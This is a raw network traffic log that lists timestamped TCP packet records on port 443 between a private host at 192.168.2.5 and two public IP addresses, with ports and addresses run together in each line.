                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.314410925 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.314421892 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.314464092 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.314789057 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.319044113 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.319184065 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.319231987 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.319283009 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.319293022 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.319300890 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.319503069 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.325136900 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.325354099 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.325356960 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.325496912 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.325508118 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.325575113 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.325587034 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.325597048 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.325606108 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.329839945 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.338546991 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.339700937 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.339930058 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.340208054 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.351295948 CET53668443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.648164988 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.658672094 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.663209915 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.670603037 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.670622110 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.670672894 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.670682907 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.670695066 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.670825005 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.670835972 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.670845032 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.670856953 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.670952082 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.670970917 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.671087980 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.671293974 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.671490908 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.674731970 CET4435366823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.702559948 CET4435366823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.702572107 CET4435366823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.702580929 CET4435366823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.702589035 CET4435366823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.702593088 CET4435366823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.703042030 CET53668443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.703275919 CET53668443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.703346014 CET53668443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:30.703584909 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.034962893 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.050607920 CET4435366823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.321907997 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.322212934 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.322745085 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.322830915 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.349746943 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.647070885 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.648092985 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.648200035 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.648507118 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.648864031 CET44357438172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.648992062 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.649086952 CET57438443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.683286905 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.694623947 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.694701910 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.694715023 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.694727898 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:31.695089102 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.666443110 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.683790922 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.683830976 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.683841944 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.683948040 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.683959961 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.683969021 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.683983088 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.684246063 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.684258938 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.684271097 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.684360981 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.701109886 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.701154947 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.701167107 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.701296091 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.701308012 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.701318979 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.701330900 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.701419115 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.701461077 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.701472044 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.701550961 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.718485117 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.718549013 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.718560934 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.718640089 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.718672991 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.718684912 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.718718052 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.718732119 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.718849897 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.718866110 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.718873978 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.719049931 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.736933947 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.736999035 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.737102985 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.737153053 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.737164974 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.737373114 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.737571955 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.737694979 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.737832069 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.737847090 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.741719007 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.766652107 CET53668443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.770598888 CET53668443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.864720106 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.864732981 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.870417118 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.870515108 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.870536089 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.870608091 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.870665073 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875030041 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875272036 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875344992 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875437021 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875449896 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875509024 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875550985 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875562906 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875572920 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875582933 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875585079 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875591993 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.875828028 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.884916067 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.885235071 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.885265112 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.885368109 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.885380983 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.885477066 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.885488987 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.885502100 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.885514021 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.885600090 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.885611057 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.885622978 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.885767937 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:32.896389961 CET53668443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.337460995 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.337471008 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.337481976 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.337625980 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.339238882 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.339263916 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.339277029 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.339417934 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.339430094 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.339442968 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.339454889 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.339562893 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.339575052 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.339586020 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.339695930 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.349883080 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.349925041 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.349937916 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.350143909 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.350153923 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.350164890 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.350178003 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.350194931 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.350205898 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.350212097 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.350589037 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.359940052 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.359981060 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.359992981 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.360132933 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.360145092 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.360157013 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.360169888 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.360270023 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.360282898 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.360308886 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.361042976 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.403491974 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.426567078 CET4435366823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.443339109 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.447369099 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.452919006 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.453438997 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.453452110 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.453581095 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.453593016 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.453603983 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.453614950 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.453620911 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.453782082 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.453794003 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.453797102 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.453805923 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.453814983 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.454142094 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.466331959 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.466418028 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.466428995 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.466532946 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.466542006 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.466728926 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.473289013 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.474735975 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.572969913 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.574136972 CET4435366823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.578880072 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.579101086 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.579149961 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.579269886 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.579413891 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.579478979 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.579492092 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.579606056 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.579617977 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.579634905 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.579648018 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.579771996 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.579782963 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.580585957 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.591811895 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.591851950 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:33.591862917 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.571845055 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.571911097 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.571921110 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.572323084 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.576853037 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.577334881 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.577373028 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.577434063 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.577447891 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.577460051 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.577482939 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.577755928 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.577766895 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.579061985 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.583358049 CET63968443192.168.2.523.200.88.9
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.610692024 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.626060963 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.626075029 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.626111984 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.626123905 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.626136065 CET4436396823.200.88.9192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:47:34.626146078 CET4436396823.200.88.9192.168.2.5
